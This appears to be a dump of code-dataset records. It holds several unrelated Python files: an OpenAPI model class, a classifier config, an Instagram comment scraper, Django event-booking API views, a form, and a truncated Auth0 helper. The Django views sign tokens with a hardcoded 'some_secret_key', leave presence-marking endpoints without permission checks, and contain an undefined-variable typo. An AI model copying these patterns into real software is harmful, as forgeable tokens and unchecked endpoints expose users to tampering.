E501\n\n\n :return: The topic_status of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._topic_status\n\n @topic_status.setter\n def topic_status(self, topic_status):\n \"\"\"Sets the topic_status of this Topic.\n\n\n :param topic_status: The topic_status of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._topic_status = topic_status\n\n @property\n def title(self):\n \"\"\"Gets the title of this Topic. # noqa: E501\n\n\n :return: The title of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._title\n\n @title.setter\n def title(self, title):\n \"\"\"Sets the title of this Topic.\n\n\n :param title: The title of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and title is None: # noqa: E501\n raise ValueError(\"Invalid value for `title`, must not be `None`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n title is not None and len(title) < 1):\n raise ValueError(\"Invalid value for `title`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._title = title\n\n @property\n def priority(self):\n \"\"\"Gets the priority of this Topic. # noqa: E501\n\n\n :return: The priority of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._priority\n\n @priority.setter\n def priority(self, priority):\n \"\"\"Sets the priority of this Topic.\n\n\n :param priority: The priority of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._priority = priority\n\n @property\n def labels(self):\n \"\"\"Gets the labels of this Topic. # noqa: E501\n\n\n :return: The labels of this Topic. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._labels\n\n @labels.setter\n def labels(self, labels):\n \"\"\"Sets the labels of this Topic.\n\n\n :param labels: The labels of this Topic. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._labels = labels\n\n @property\n def creation_date(self):\n \"\"\"Gets the creation_date of this Topic. # noqa: E501\n\n\n :return: The creation_date of this Topic. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._creation_date\n\n @creation_date.setter\n def creation_date(self, creation_date):\n \"\"\"Sets the creation_date of this Topic.\n\n\n :param creation_date: The creation_date of this Topic. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._creation_date = creation_date\n\n @property\n def creation_author(self):\n \"\"\"Gets the creation_author of this Topic. # noqa: E501\n\n\n :return: The creation_author of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._creation_author\n\n @creation_author.setter\n def creation_author(self, creation_author):\n \"\"\"Sets the creation_author of this Topic.\n\n\n :param creation_author: The creation_author of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n creation_author is not None and len(creation_author) > 254):\n raise ValueError(\"Invalid value for `creation_author`, length must be less than or equal to `254`\") # noqa: E501\n\n self._creation_author = creation_author\n\n @property\n def modified_date(self):\n \"\"\"Gets the modified_date of this Topic. # noqa: E501\n\n\n :return: The modified_date of this Topic. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._modified_date\n\n @modified_date.setter\n def modified_date(self, modified_date):\n \"\"\"Sets the modified_date of this Topic.\n\n\n :param modified_date: The modified_date of this Topic. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._modified_date = modified_date\n\n @property\n def modified_author(self):\n \"\"\"Gets the modified_author of this Topic. # noqa: E501\n\n\n :return: The modified_author of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._modified_author\n\n @modified_author.setter\n def modified_author(self, modified_author):\n \"\"\"Sets the modified_author of this Topic.\n\n\n :param modified_author: The modified_author of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n modified_author is not None and len(modified_author) > 254):\n raise ValueError(\"Invalid value for `modified_author`, length must be less than or equal to `254`\") # noqa: E501\n\n self._modified_author = modified_author\n\n @property\n def assigned_to(self):\n \"\"\"Gets the assigned_to of this Topic. # noqa: E501\n\n\n :return: The assigned_to of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._assigned_to\n\n @assigned_to.setter\n def assigned_to(self, assigned_to):\n \"\"\"Sets the assigned_to of this Topic.\n\n\n :param assigned_to: The assigned_to of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n assigned_to is not None and len(assigned_to) > 254):\n raise ValueError(\"Invalid value for `assigned_to`, length must be less than or equal to `254`\") # noqa: E501\n\n self._assigned_to = assigned_to\n\n @property\n def reference_links(self):\n \"\"\"Gets the reference_links of this Topic. # noqa: E501\n\n\n :return: The reference_links of this Topic. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._reference_links\n\n @reference_links.setter\n def reference_links(self, reference_links):\n \"\"\"Sets the reference_links of this Topic.\n\n\n :param reference_links: The reference_links of this Topic. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._reference_links = reference_links\n\n @property\n def stage(self):\n \"\"\"Gets the stage of this Topic. # noqa: E501\n\n\n :return: The stage of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._stage\n\n @stage.setter\n def stage(self, stage):\n \"\"\"Sets the stage of this Topic.\n\n\n :param stage: The stage of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._stage = stage\n\n @property\n def description(self):\n \"\"\"Gets the description of this Topic. # noqa: E501\n\n\n :return: The description of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"Sets the description of this Topic.\n\n\n :param description: The description of this Topic. # noqa: E501\n :type: str\n \"\"\"\n\n self._description = description\n\n @property\n def due_date(self):\n \"\"\"Gets the due_date of this Topic. # noqa: E501\n\n\n :return: The due_date of this Topic. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._due_date\n\n @due_date.setter\n def due_date(self, due_date):\n \"\"\"Sets the due_date of this Topic.\n\n\n :param due_date: The due_date of this Topic. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._due_date = due_date\n\n @property\n def ifcs(self):\n \"\"\"Gets the ifcs of this Topic. # noqa: E501\n\n\n :return: The ifcs of this Topic. # noqa: E501\n :rtype: list[int]\n \"\"\"\n return self._ifcs\n\n @ifcs.setter\n def ifcs(self, ifcs):\n \"\"\"Sets the ifcs of this Topic.\n\n\n :param ifcs: The ifcs of this Topic. # noqa: E501\n :type: list[int]\n \"\"\"\n\n self._ifcs = ifcs\n\n @property\n def format(self):\n \"\"\"Gets the format of this Topic. # noqa: E501\n\n\n :return: The format of this Topic. # noqa: E501\n :rtype: str\n \"\"\"\n return self._format\n\n @format.setter\n def format(self, format):\n \"\"\"Sets the format of this Topic.\n\n\n :param format: The format of this Topic. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n format is not None and len(format) > 64):\n raise ValueError(\"Invalid value for `format`, length must be less than or equal to `64`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n format is not None and len(format) < 1):\n raise ValueError(\"Invalid value for `format`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._format = format\n\n @property\n def index(self):\n \"\"\"Gets the index of this Topic. # noqa: E501\n\n\n :return: The index of this Topic. # noqa: E501\n :rtype: int\n \"\"\"\n return self._index\n\n @index.setter\n def index(self, index):\n \"\"\"Sets the index of this Topic.\n\n\n :param index: The index of this Topic. # noqa: E501\n :type: int\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n index is not None and index > 2147483647): # noqa: E501\n raise ValueError(\"Invalid value for `index`, must be a value less than or equal to `2147483647`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n index is not None and index < 0): # noqa: E501\n raise ValueError(\"Invalid value for `index`, must be a value greater than or equal to `0`\") # noqa: E501\n\n self._index = index\n\n @property\n def project(self):\n \"\"\"Gets the project of this Topic. # noqa: E501\n\n\n :return: The project of this Topic. # noqa: E501\n :rtype: int\n \"\"\"\n return self._project\n\n @project.setter\n def project(self, project):\n \"\"\"Sets the project of this Topic.\n\n\n :param project: The project of this Topic. # noqa: E501\n :type: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and project is None: # noqa: E501\n raise ValueError(\"Invalid value for `project`, must not be `None`\") # noqa: E501\n\n self._project = project\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Topic):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, Topic):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"bimdata_api_client/models/topic.py","file_name":"topic.py","file_ext":"py","file_size_in_byte":17144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"589691132","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author:XuMing(xuming624@qq.com)\n@description:\n\"\"\"\n\nimport os\n\npwd_path = os.path.abspath(os.path.dirname(__file__))\n\ntrain_path = os.path.join(pwd_path, \"data/train.txt\")\ntest_path = os.path.join(pwd_path, \"data/test.txt\")\n# run preprocess.py to segment train and test data\ntrain_seg_path = os.path.join(pwd_path, \"../examples/train_seg_sample.txt\") # segment of train file\ntest_seg_path = os.path.join(pwd_path, \"../examples/test_seg_sample.txt\") # segment of test file\n\ncol_sep = '\\t' # separate label and content of train data\n\n# one of \"logistic_regression, random_forest, bayes, decision_tree, svm, knn, xgboost, xgboost_lr,\n# fasttext, cnn, rnn, han\"\nmodel_type = \"logistic_regression\"\n\n# feature type\n# classic text classification usage: one of \"tfidf_char, tfidf_word, tf_word\",\n# deep text classification usage: cnn/rnn/fasttext is \"vectorize\"\nfeature_type = 'tfidf_word'\n\ndebug = True\n# default params\nsentence_symbol_path = os.path.join(pwd_path, 'data/sentence_symbol.txt')\nstop_words_path = os.path.join(pwd_path, 'data/stopwords.txt')\n\noutput_dir = os.path.join(pwd_path, \"../examples\") # output dir\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\nword_vocab_path = os.path.join(output_dir, \"vocab_{}_{}.txt\".format(feature_type, model_type)) # vocab path\nlabel_vocab_path = os.path.join(output_dir, \"label_{}_{}.txt\".format(feature_type, model_type)) # label path\npr_figure_path = os.path.join(output_dir, \"R_P_{}_{}.png\".format(feature_type, model_type)) # precision recall figure\nfeature_vec_path = os.path.join(output_dir, \"feature_{}.pkl\".format(feature_type)) # vector path\nmodel_save_path = os.path.join(output_dir, \"model_{}_{}.pkl\".format(feature_type, model_type)) # save model path\nlr_feature_weight_path = os.path.join(output_dir, \"lr_feature_weight.txt\")\n# predict\npred_save_path = os.path.join(output_dir, \"pred_result_{}_{}.txt\".format(feature_type, model_type))\n\n# --- deep model for train ---\nmax_len = 300 # max len words of sentence\nmin_count = 1 # word will not be added to dictionary if it's frequency is less than min_count\nbatch_size = 64\nnb_epoch = 10\nembedding_dim = 128\nhidden_dim = 128\ndropout = 0.5\n","sub_path":"pytextclassifier/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"641659294","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom InstagramAPI import InstagramAPI\nimport time\nfrom datetime import datetime\nimport json\nimport datetime\nfrom user_handler import getAge, getGender\nimport _pickle as pickle\nfrom naive_bayes import naive_bayes\nfrom statistics import mode\n\nall_comments = []\n\ndef classify_nb(comments):\n\n result = []\n for text in comments:\n result.append(naive_bayes.naive_bayes_classify_from_text(naive_bayes.load_model(),text))\n return mode(result)\n\ndef getComments(API, media_id):\n \n if(not media_id): \n print(\"media_id not found\")\n return False\n\n print(\"getting comments\")\n\n has_more_comments = True\n max_id = ''\n\n flag = True\n\n while has_more_comments and flag:\n _ = API.getMediaComments(media_id, max_id=max_id)\n # comments' page come from older to newer, lets preserve desc order in full list\n try:\n for c in reversed(API.LastJson['comments']):\n all_comments.append(c)\n if len(all_comments) > 500:\n flag = False\n \n except:\n print(API.LastJson)\n \n has_more_comments = API.LastJson.get('has_more_comments', False)\n \n if has_more_comments:\n max_id = API.LastJson.get('next_max_id', '')\n time.sleep(1)\n\n\n print(\"number of comments: \" +str(len(all_comments)))\n\n return(all_comments)\n\n","sub_path":"data_collector/get_comments.py","file_name":"get_comments.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"624940231","text":"from itsdangerous import URLSafeSerializer, BadData\nfrom django.http import JsonResponse, HttpResponse\nfrom django.urls import reverse\nfrom users.models import CustomUser\nfrom django.db.models import Q\nfrom functools import reduce\nfrom operator import __or__ as OR\n\nfrom time import strftime\nimport locale\nfrom plateformeweb.models import Event, Organization, OrganizationPerson, Place\nfrom urllib.parse import parse_qs\nfrom django.utils import timezone\nimport datetime\nfrom django.db.models.signals import post_save\nfrom actstream import action\nfrom actstream.actions import follow, unfollow\n\nfrom django.template.loader import render_to_string\nfrom actstream.models import actor_stream\n\nfrom plateformeweb.views import send_notification\n\nfrom post_office import mail\nfrom django.core.mail import send_mail\nfrom django.utils.timezone import now\n\n\n### mailers ###\ndef cancel_reservation(request, token):\n s = URLSafeSerializer('some_secret_key', salt='cancel_reservation')\n ret = s.loads(token)\n event_id = ret['event_id']\n user_id = ret['user_id']\n event = Event.objects.get(pk=event_id)\n user = CustomUser.objects.get(pk=user_id)\n context = {'event': event, 'user': user}\n attendees = event.attendees.all()\n if user in attendees:\n event.attendees.remove(user)\n event.available_seats += 1\n event.save()\n return render(request, 'mail/cancel_ok.html', context)\n else:\n return render(request, 'mail/cancel_failed.html', context)\n\ndef send_booking_mail(request, user, event):\n user_id = user.id\n event_id = event.id\n\n serial = URLSafeSerializer('some_secret_key',\n salt='cancel_reservation')\n data = {'event_id': event_id, 'user_id': user_id}\n\n cancel_token = serial.dumps(data)\n cancel_url = reverse('cancel_reservation', args=[cancel_token])\n cancel_url = request.build_absolute_uri(cancel_url)\n\n event_url = reverse('event_detail', args=[event_id, event.slug])\n event_url = request.build_absolute_uri(event_url)\n\n params = {'cancel_url': cancel_url,\n 'event_url': event_url,\n 'event': event}\n\n msg_plain = render_to_string('mail/relance.html',\n params)\n msg_html = render_to_string('mail/relance.html',\n params)\n\n date = event.starts_at.date().strftime(\"%d %B\")\n location = event.location.name\n subject = \"Votre réservation pour le \" + date + \" à \" + location\n\n mail.send(\n [user.email],\n 'no-reply@atelier-soude.fr',\n subject=subject,\n message=msg_plain,\n html_message=msg_html\n )\n\n\n### event ###\ndef delete_event(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n request_body = request.body.decode(\"utf-8\")\n post_data = parse_qs(request_body)\n\n event_id = post_data['event_id'][0]\n event = Event.objects.get(pk=event_id)\n person = CustomUser.objects.get(email=request.user)\n if person in event.organizers.all():\n action.send(request.user, verb=\"a supprimé\", target=event) \n event.delete()\n return JsonResponse({'status': \"OK\"})\n\n return JsonResponse({'status': -1})\n\n\n\ndef set_present(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n serial = URLSafeSerializer('some_secret_key',\n salt='presence')\n\n data = serial.loads(request.POST['idents'])\n event_id = data['event_id']\n user_id = data['user_id']\n\n person = CustomUser.objects.get(pk=user_id)\n event = Event.objects.get(pk=event_id)\n event.attendees.remove(person)\n event.presents.add(person)\n action.send(request.user, verb=\"a validé la présence de\", action_object=person, target=event) \n\n return JsonResponse({'status': \"OK\", 'user_id': user_id})\n\ndef set_absent(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n serial = URLSafeSerializer('some_secret_key',\n salt='presence')\n\n data = serial.loads(request.POST['idents'])\n event_id = data['event_id']\n user_id = data['user_id']\n\n person = CustomUser.objects.get(pk=user_id)\n event = Event.objects.get(pk=event_id)\n event.presents.remove(person)\n event.attendees.add(person)\n action.send(request.user, verb=\"a dé-validé la présence de\", action_object=person, target=event) \n\n return JsonResponse({'status': \"OK\", 'user_id': user_id})\n\ndef get_organizations(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n person = CustomUser.objects.get(email=request.user)\n organizations = OrganizationPerson.objects.filter(user=request.user)\n volunteer_of = {}\n for person in organizations:\n if person.role >= OrganizationPerson.VOLUNTEER:\n volunteer_of[person.organization.pk] = person.organization.name\n\n return JsonResponse({'status': \"OK\", \"organizations\": volunteer_of})\n\ndef get_all_places(request):\n if request.method != 'GET':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n places = {}\n places_qs = Place.objects.all()\n for place in places_qs:\n place_slug = place.slug\n place_pk = place.pk\n organization = place.organization\n organization_detail_url = reverse('organization_detail',\n args=[organization.pk,\n organization.slug])\n\n place_detail_url = reverse('place_detail',\n args=[place_pk,\n place_slug])\n\n longitude = place.address.longitude\n latitude = place.address.latitude\n\n places[place_pk] = {\n 'pk': place_pk,\n 'name': place.name,\n 'place_detail_url': place_detail_url,\n \"address\": place.address.formatted,\n 'type': place.type.name,\n 'organization': place.organization.name,\n 'organization_url': organization_detail_url,\n 'latitude': latitude,\n 'longitude': longitude,\n 'picture': place.picture.url,\n 'description': place.description[:250],\n }\n\n return JsonResponse({'status': \"OK\", \"places\": places})\n\ndef get_places_for_organization(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n places = {}\n organization_pk = request.POST['organization_id']\n organization = Organization.objects.get(pk=organization_pk)\n places_qs = Place.objects.filter(organization=organization)\n for place in places_qs:\n places[place.pk] = str(place)\n\n return JsonResponse({'status': \"OK\", \"places\": places})\n\ndef get_dates(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n events = {}\n request_body = request.body.decode(\"utf-8\")\n post_data = parse_qs(request_body)\n organization_pk = int(post_data['organization_pk'][0])\n today = timezone.now()\n\n target_organization = Organization.objects.get(pk=organization_pk)\n all_future_events = Event.objects.filter(organization=target_organization, starts_at__gte=today)\n\n for event in all_future_events:\n events[event.pk] = {'title': event.title,\n 'formatted_date': event.date_interval_format(),\n 'timestamp': event.starts_at.timestamp()}\n\n return JsonResponse({'status': \"OK\", \"dates\": events})\n\n\ndef list_events_in_context(request, context_pk=None, context_type=None, context_user=None, context_place=None, context_org=None ):\n if request.method != 'GET':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n events = []\n organizations = {}\n places = {}\n activitys = {}\n today = timezone.now()\n\n if context_place:\n this_place = Place.objects.get(pk=context_pk)\n all_future_events = Event.objects.filter(\n location=this_place, \n starts_at__gte=today, \n published=True).order_by('starts_at')\n \n elif context_org:\n this_organization = Organization.objects.get(pk=context_pk)\n all_future_events = Event.objects.filter(\n organization=this_organization, \n starts_at__gte=today, \n published=True).order_by('starts_at')\n \n elif context_user:\n lst = [Q(attendees__pk=context_pk) , Q(presents__pk=context_pk) , Q(organizers__pk=context_pk)]\n all_future_events = Event.objects.filter(reduce(OR, lst)).filter(\n starts_at__gte=today, \n published=True).order_by('starts_at')\n\n else:\n all_future_events = Event.objects.filter(\n starts_at__gte=today, \n published=True).order_by('starts_at')\n\n\n locale.setlocale(locale.LC_ALL, 'fr_FR')\n\n for event in all_future_events:\n event_pk = event.pk\n event_slug = event.slug\n event_detail_url = reverse('event_detail', args=[event_pk, event_slug])\n event_start_timestamp = event.starts_at.timestamp() * 1000\n organization = event.organization\n place = event.location\n activity = event.type\n\n if organization.pk not in organizations:\n organization_slug = organization.slug\n organization_pk = organization.pk\n organization_detail_url = reverse('organization_detail',\n args=[organization_pk,\n organization_slug])\n organizations[organization_pk] = {\n 'pk': organization_pk,\n 'name': organization.name,\n 'slug': organization_slug,\n 'organization_detail_url': organization_detail_url,\n }\n \n if place.pk not in places:\n place_slug = place.slug\n place_pk = place.pk\n place_detail_url = reverse('place_detail',\n args=[place_pk,\n place_slug])\n places[place_pk] = {\n 'pk': place_pk,\n 'name': place.name,\n 'truncated_name': place.name[0:25],\n 'slug': place_slug,\n 'place_detail_url': place_detail_url,\n }\n\n if activity.pk not in activitys:\n activity_slug = activity.slug\n activity_pk = activity.pk\n activity_detail_url = reverse('activity_detail',\n args=[activity_pk,\n activity_slug])\n activitys[activity_pk] = {\n 'pk': activity_pk,\n 'name': activity.name,\n 'truncated_name': activity.name[0:25],\n 'slug': activity_slug,\n 'activity_detail_url': activity_detail_url,\n }\n\n events += [{\n 'pk': event.pk,\n 'title': event.title,\n 'slug': event_slug,\n 'available_seats': event.available_seats,\n 'type_picture_url': event.type.picture.url,\n 'event_detail_url': event_detail_url,\n 'book_url': reverse('booking_form', args=[event_pk]),\n 'edit_url': reverse('event_edit', args=[event_pk]),\n 'organization_pk': organization.pk,\n 'place_pk': event.location.pk,\n 'type_pk': event.type.pk,\n 'published': event.published,\n 'starts_at': event.starts_at.strftime(\"%H:%M\"),\n 'ends_at': event.ends_at.strftime(\"%H:%M\"),\n 'start_timestamp': event_start_timestamp,\n 'user_in_attendees': request.user in event.attendees.all(),\n 'user_in_presents': request.user in event.presents.all(),\n 'user_in_organizers': request.user in event.organizers.all(),\n 'day_month_str': event.starts_at.strftime(\"%d %B\"),\n }]\n\n return JsonResponse({'status': \"OK\", \"dates\": events, \"organizations\": organizations, \"places\": places, \"activities\": activitys, })\n\ndef book_event(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n request_body = request.body.decode(\"utf-8\")\n post_data = parse_qs(request_body)\n event_id = post_data['event_id'][0]\n user = CustomUser.objects.get(email=request.user.email)\n event = Event.objects.get(pk=event_id)\n organization = event.organization\n attendees = event.attendees.all()\n\n user_volunteer_orgs = OrganizationPerson.objects.filter(user=user,\n role__gte=OrganizationPerson.VOLUNTEER)\n\n\n if user in attendees:\n if organization not in user_volunteer_orgs:\n event.available_seats += 1\n event.attendees.remove(user)\n action.send(user, verb=\"s'est désinscrit de\", target=event) \n event.save()\n return JsonResponse({'status': 'unbook',\n 'available_seats': event.available_seats})\n else:\n if event.available_seats >= 0:\n if organization not in user_volunteer_orgs:\n event.available_seats -= 1 \n action.send(user, verb=\"s'est inscrit à\", target=event) \n follow(user, event, actor_only=False)\n event.attendees.add(user)\n # send booking mail here or notification here\n send_booking_mail(request, user, event)\n #send_notification(request, user)\n \n else:\n return JsonResponse({'status': -1})\n\n event.save()\n return JsonResponse({'status': 'unbook',\n 'available_seats': event.available_seats})\n\ndef list_users(request, organization_pk, event_pk):\n if request.method != 'GET':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n user = CustomUser.objects.get(email=request.user.email)\n organization = Organization.objects.get(pk=organization_pk)\n user_is_admin = OrganizationPerson.objects.get(user=user, organization=organization, role__gte=OrganizationPerson.ADMIN)\n if not user_is_admin:\n return JsonResponse({'status': -1})\n\n users = OrganizationPerson.objects.filter(organization=organization)\n event = Event.objects.get(pk=event_pk)\n every_attendee = event.attendees.all() | event.presents.all() | event.organizers.all()\n users_dict = []\n for user in users:\n if user.user not in every_attendee:\n new_user = {\n 'pk': user.user.pk,\n 'name': user.user.get_full_name(),\n 'email': user.user.email,\n 'role': user.role,\n }\n users_dict += [new_user]\n return JsonResponse({'status': \"OK\",\n 'users': users_dict})\ndef add_users(request):\n if request.method != 'POST':\n # TODO change this\n return HttpResponse(\"Circulez, il n'y a rien à voir\")\n else:\n request_body = request.body.decode(\"utf-8\")\n post_data = parse_qs(request_body)\n event_pk = post_data['event_pk'][0]\n user_list = post_data['user_list'][0].split(',')\n event = Event.objects.get(pk=event_pk)\n every_attendee = event.attendees.all() | event.presents.all() | event.organizers.all()\n seats = event.available_seats\n presents_pk = []\n attending_pk = []\n\n for user_pk in user_list:\n user = CustomUser.objects.get(pk=user_pk)\n now = timezone.now()\n\n if event.starts_at <= now:\n event.presents.add(user)\n pesents_pk += [user.pk]\n else:\n if user not in every_attendee:\n print(\"a\")\n seats -= 1\n\n event.attendees.add(user)\n attending_pk += [user.pk]\n action.send(request.user, verb=\"a inscris\", action_object=user, target=event) \n else:\n event.presents.add(user) \n presents_pk += [user.pk]\n \n\n\n event.available_seats = seats\n event.save()\n return JsonResponse({'status': 'OK',\n 'seats': seats,\n 'presents_pk': presents_pk,\n 'attending_pk': attending_pk})\n \n\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"396963837","text":"from django.contrib.admin.widgets import FilteredSelectMultiple\nfrom django.contrib.auth.models import Group\nfrom django.forms import ModelMultipleChoiceField, ModelForm\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.evaluations.models import Survey, Question\n\n\nclass QuestionForm(ModelForm):\n\n class Meta:\n model = Question\n fields = (\n 'survey', 'question', 'question_fr', 'question_nl'\n )\n\n\nclass AddGroupSurveyForm(ModelForm):\n groups = ModelMultipleChoiceField(\n label=_('Survey'), queryset=Group.objects.all(), widget=FilteredSelectMultiple('Group', is_stacked=True),\n required=False\n )\n\n def __init__(self, *args, **kwargs):\n instance = kwargs.get('instance')\n if instance:\n initial = kwargs.setdefault('initial', {})\n initial['groups'] = [group.pk for group in instance.groups.all()]\n super().__init__(*args, **kwargs)\n\n class Meta:\n model = Survey\n fields = (\n 'name_en', 'name_fr', 'name_nl', 'groups'\n )\n\n def save(self, commit=True):\n instance = super().save(False)\n _save_m2m = self.save_m2m\n\n def save_m2m():\n _save_m2m()\n instance.groups.clear()\n instance.groups.add(*self.cleaned_data['groups'])\n self.save_m2m = save_m2m\n if commit:\n instance.save()\n self.save_m2m()\n return instance\n","sub_path":"lifeline-backend-master/apps/evaluations/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"552806935","text":"\"\"\"\nApplication Extension API\n\"\"\"\n\nimport os\nimport sys\nimport fnmatch\nimport platform\n\nimport zope\nimport p6.api\n\nclass ExtensionPrefField(object):\n def __init__(self, id, type, label, value=None):\n self.id = id\n self.type = type\n self.label = label\n\n self.value = value\n \nclass ExtensionPrefs(object):\n def __init__(self, id, label, fields={}):\n self.id = id\n self.label = label\n\n self.fields = fields\n \ndef extPaths():\n \"\"\"Return a list of paths to search for extensions and plugins.\"\"\"\n\n return [os.path.join(os.path.abspath('.'), 'extensions'),\n os.path.join(p6.api.getSupportDir(), 'extensions')\n ]\n\ndef extConfs(path):\n \"\"\"Generates a list of configuration files in the specified path;\n searches path and all subfolders for 'extension.zcml'.\"\"\"\n \n for (path, dirnames, filenames) in os.walk(path):\n for f in fnmatch.filter(filenames, 'extension.zcml'):\n yield os.path.join(path, f)\n\ndef loadExtension(extzcml, context):\n \"\"\"Loads the extension specified by [extzcml] -- modifies the Python\n Path to include the folder containing [extzcml].\"\"\"\n\n sys.path.insert(0, os.path.dirname(extzcml))\n zope.configuration.xmlconfig.file(extzcml, context=context)\n","sub_path":"publisher/tags/ccpublisher-2.0.3/p6/app/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"559838020","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.15-x86_64/egg/foxylib/tools/auth/auth0/auth0_tool.py\n# Compiled at: 2020-01-21 01:42:50\n# Size of source mod 2**32: 3074 bytes\nfrom functools import wraps\nfrom authlib.flask.client import OAuth\nfrom six.moves.urllib.parse import urlencode\nfrom flask import session, redirect\n\nclass Auth0Tool:\n\n class Config:\n CLIENT_ID = 'client_id'\n CLIENT_SECRET = 'client_secret'\n API_BASE_URL = 'api_base_url'\n SCOPE = 'scope'\n\n @classmethod\n def j_config2client_id(cls, j_config):\n return j_config[cls.Config.CLIENT_ID]\n\n @classmethod\n def j_config2client_secret(cls, j_config):\n return j_config[cls.Config.CLIENT_SECRET]\n\n @classmethod\n def j_config2api_base_url(cls, j_config):\n return j_config[cls.Config.API_BASE_URL]\n\n @classmethod\n def j_config2scope(cls, j_config):\n return j_config[cls.Config.SCOPE]\n\n @classmethod\n def app_config2auth0(cls, app, j_config):\n oauth = OAuth(app)\n base_url = cls.j_config2api_base_url(j_config)\n scope = cls.j_config2scope(j_config)\n access_token_url = '{}/oauth/token'.format(base_url)\n authorize_url = '{}/authorize'.format(base_url)\n auth0 = oauth.register('auth0',\n client_id=(cls.j_config2client_id(j_config)),\n client_secret=(cls.j_config2client_secret(j_config)),\n api_base_url=base_url,\n access_token_url=access_token_url,\n authorize_url=authorize_url,\n client_kwargs={'scope': scope})\n return auth0\n\n @classmethod\n def auth0_url2callback(cls, auth0, url_redirect):\n auth0.authorize_access_token()\n resp = auth0.get('userinfo')\n 